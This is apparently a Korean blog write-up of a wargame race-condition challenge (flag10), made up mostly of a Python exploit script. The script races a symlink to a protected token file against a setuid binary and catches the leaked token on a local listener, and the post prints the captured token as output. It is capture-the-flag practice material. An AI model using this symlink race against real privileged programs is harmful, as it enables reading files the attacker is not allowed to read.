...2시간 동안 삽질해서 푼 레이스컨디션.. 파이썬 코드로 작성했다.
import os
import socket
import subprocess
import threading
import time
import signal
def read_until(s,msg):
tmp = ""
while True:
tmp += s.recv(1)
if msg in tmp:
print tmp
return
def GetFlag():
s = socket.socket()
Port = ('localhost',18211)
s.bind(Port)
s.listen(10)
while True:
cs,addr = s.accept()
#print "[*]serer start "
pid = os.fork()
if pid==0:
print "[*]server connection success ! "
print read_until(cs,".oO Oo.")
time.sleep(1)
buf = cs.recv(100)
print "[*]file is "+buf
os.system("echo \""+buf+"\"> result")
exit()
else:
os.waitpid(pid,0)
def Racefile():
while True:
os.system("rm -rf token")
os.system("echo 'aaa' >> token")
os.system("rm -rf token;ln -sf /home/flag10/token token")
def Attack():
while True:
args = "/home/flag10/flag10 token 127.0.0.1"
proc = subprocess.Popen(args,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
output = proc.communicate()[0]
#print "[*]result: %s" %(output)
os.system("rm -rf token")
def main():
pid = os.fork()
if pid == 0:
Racefile()
pid2 = os.fork()
if pid2 == 0:
GetFlag()
Attack()
if __name__ == '__main__':
main()
ex.py[*]server connection success !
.oO Oo.
None
[*]file is
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
[*]server connection success !
'Wargame' 카테고리의 다른 글
| [pwnable.kr]nuclear (0) | 2015.12.22 |
|---|---|
| [pwnable.kr]alloca (0) | 2015.12.18 |
| [pwnable.kr]crypto1 (0) | 2015.07.06 |
| Codegate2015 bookstore (0) | 2015.07.01 |
| [codegate2015]pirate_danbi (0) | 2015.05.12 |